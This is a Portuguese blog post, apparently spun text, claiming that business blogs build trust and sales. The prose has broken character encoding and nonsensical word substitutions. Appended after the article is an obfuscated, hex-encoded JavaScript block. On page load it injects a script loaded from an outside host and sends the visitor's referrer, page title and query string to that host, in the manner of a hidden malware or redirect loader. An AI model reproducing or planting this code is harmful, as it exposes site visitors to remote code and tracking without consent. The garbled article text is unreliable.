Blog

Blogs E Vendas: Uma Parceria De Empreendimento Natural ?

Como o visitante pode supor, uma de principais razA�es pelas quais as empresas consideram os blogs eficientes como ferramentas de negA?cios A� de que elas auxiliam a gerar ou promover as vendas. Embora nA?o haja um valor quantitativo com relaA�A?o A� importA?ncia monetA?ria exata dos blogues sobre as vendas, hA? evidA?ncias do algum gA�nero de retorno sobre este investimento. Este aumento nas vendas pode ser e geralmente A� especialmente um destes efeitos indiretos dos blogs de sucesso.

Blogs – bom para os negA?cios

Imagine sentar em frente ao seu computador usando milhA�es de pessoas (acionistas, parceiros de negA?cios, concorrentes, funcionA?rios e a mA�dia) conversando a cerca de negA?cios e afins. Actualmente imagine se vocA? pode vir a usar todas as informaA�A�es que vocA? aprendeu para estabelecer este produto ou serviA�o que seus clientes querem, por que eles querem, como eles querem e quanto eles estA?o dispostos a pagar assim sendo. Isto foi precisamente este que foi um blogue e muito mais. Definitivamente, os blogues sA?o bons para as empresas.

Um blog ou um blog A� especialmente um sitio interativo de que mantA�m uma crA?nica contA�nua de informaA�A�es. A� 1 site atualizado regularmente usando links para outros artigos ou outros sites. Geralmente, um blogue tende a ter uma A?rea de conteA?do primA?rio com artigos chamados postagens ou entradas listadas em ordem cronolA?gica inversa usando as muito mais recentes pelo topo. Geralmente, esses artigos sA?o organizados em categorias. HA? igualmente um arquivo de artigos baseado em datas. 1 blogroll, uma lista por links para outros sitios relacionados foi outra caracterA�stica de um blog.

Um blog pode conter um ou mais feeds. A maioria dos blogs publica feeds (RSS, RDF, Atom). Um feed A� 1 conteA?do legA�vel por mA?quina que A� atualizado periodicamente. Um leitor de feeds exibe a nova postagem e 1 link para ela. A maior parte dos blogues tambA�m tem um recurso que permite aos visitantes deixar comentA?rios. Com um blog, vocA? publica novos conteA?dos e seus leitores podem adicionar seus prA?prios comentA?rios com links para seus prA?prios blogs. FA?cil de usar ferramentas por blogs estA?o disponA�veis, muitas vezes de graA�a. Uma ferramenta bA?sica por blogging fornece uma interface onde vocA? pode funcionar de maneira fA?cil e intuitiva enquanto cuida do restante da logA�stica envolvida em tornar seu blogue apresentA?vel e disponA�vel para o pA?blico.

Blogar, criar ou manter um blog A� especialmente uma de A?reas por rA?pido aumento da Internet. De acordo com o popular motor de parecer Technorati, existem mais por 40 milhA�es de blogues na Net hoje em dia e mais blogues estA?o aparecendo na taxa de 75. 000 por dia. Isto foi principalmente devido aos inA?meros benefA�cios do blogs para negA?cios.

Um blogue tem uma poderosa propriedade de marketing para expandir seus negA?cios, seja ele pequeno ou grande. Actualmente vocA? pode vir a ter uma presenA�a dominante na Web, nA?o baseada em tamanho, capital ou recursos, porA�m baseada na qualidade de conteA?do, pA?blico-alvo e suplementos alimentares e serviA�os A?teis. Usando blogs saiba como equalizadores, a blogosfera se tornou um campo por jogo verdadeiramente estimulante para todas as empresas.

Um blog A� uma fonte repetida de informaA�A�es valiosas e atualizadas. A criaA�A?o de um blogue permite que vocA? demonstre sua experiA?ncia e se estabeleA�a saiba como um lA�der de teorias em seu setor. Um blog pode ser seu veA�culo para atualizaA�A�es de suplementos alimentares ou serviA�os, notA�cias da empresa e qualquer outra informaA�A?o que vocA? queira transmitir ao seu pA?blico-alvo. Um blogue deve atalhar informaA�A�es relevantes, nA?o exclusivamente arremessos por vendas; caso contrA?rio, A� especialmente muito menos provA?vel de que os leitores retornem. Como acontece usando qualquer parcela de um plano por marketing da empresa, um blog deve conter informaA�A�es que atraiam seu pA?blico-alvo.

Um blogue A� um mA�todo eficaz para se comunicar com clientes e prospects. Ele permite que vocA? converse abertamente e regularmente com eles, aumentando a credibilidade, criando confianA�a e formando relacionamentos com eles desde o inA�cio. Um blog com seu estilo de conversaA�A?o A� especialmente ideal para desenvolver bons relacionamentos usando os clientes. Os leitores sentir-se-A?o A� vontade consigo muito antes de telefonarem-lhe para criar uma adquire ou confinar o seu serviA�o.

Um blog A� uma A?tima ferramenta para adquirir feedback destes leitores. Seus leitores podem deixar comentA?rios ou criar perguntas. 1 blog A� uma A?tima maneira por descobrir este que os leitores estA?o pensando e no desenvolvimento fornece idA�ias ou saiba como melhor atendA?-los, melhorando assim sendo o seu negA?cio. Formar decisA�es por negA?cios com base nos feedbacks destes leitores pode ser um dos movimentos mais hA?beis que o visitante pode criar.

Ainda assim, para ser eficaz, um blog possui que ser atualizado com freqA?A?ncia. Estes leitores nA?o visitam blogs que nA?o apresentam novos conteA?dos regularmente. Manter estes leitores informados com postagens periA?dicas a cerca de o seu negA?cio cria buzz e publicidade. HA? trabalho envolvido na criaA�A?o de 1 blog. Leva tempo e compromisso para escrever posts interessantes e informativos. PorA�m pode ser bem gasto, especialmente se ajudar a gerar vendas.

Blogs e Vendas Em Tandem

As vendas exigem interaA�A?o privada. Um blogue A� um desses lugares onde a comunicaA�A?o atravA�s de conversas prospera e os relacionamentos sA?o fomentados. Quando vocA? dA? aos seus leitores informaA�A�es importantes que eles podem vir a usar atravA�s do seu blog de forma consistente, eles ficarA?o satisfeitos. Em seguida, eles retornarA?o para ainda mais conteA?do recente regularmente. Horas extras, vocA? serA? capaz de construir um pA?blico fiel. Os leitores vA?o vA?-lo como um especialista em seu nicho especA�fico. Seus leitores vA?o confiar em vocA? e um relacionamento A� progredido. Seus leitores perceberA?o que A� menos arriscado adquirir de vocA? ou aproveitar seu serviA�o. Se vocA? pode blogar eficientemente a cerca de o tema, eles tendem a confiar que seu produto ou serviA�o valerA? a penado.

Ao blogar, o visitante estA? enviando a mensagem de que alguA�m estA? ouvindo, alguA�m de que vocA? tA?m a possibilidade de abordar tais como pode ser visto a partir por comentA?rios respondidos e novas atualizaA�A�es. Isso farA? com que seus leitores se sintam mais seguros e levarA? isso em lado, pois eles tomam uma decisA?o do compra. O blog foi inerentemente uma conversa contA�nua que, a longo prazo, gera confianA�a e lealdade e origina familiaridade. Quando eles se tornarem clientes satisfeitos, eles virA?o atA� mesmo vocA? para obter mais informaA�A�es e, se receberem a opA�A?o, desejarA?o adquirir de vocA?. Isso fortalece o relacionamento entre o visitante e seus clientes e eles tambA�m igualmente similarmente identicamente conjuntamente podem enviar outras vendas para vocA?. O ciclo continua. Para alA�m disso, um blog A� especialmente uma maneira extremamente eficiente para adquirir um ranking elevado do Search Engine. Em outras palavras, estes blogs podem vir a trazer mais leitores e mais compradores em potencial.

Blogar foi marketing para as pessoas de uma maneira menos intrusiva e ofensiva, mais tais como uma conversa freewheeling em comparaA�A?o usando um discurso de vendas irritante. A� realmente uma boa forma de fastbird.net promover as vendas, ainda de que indiretamente.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}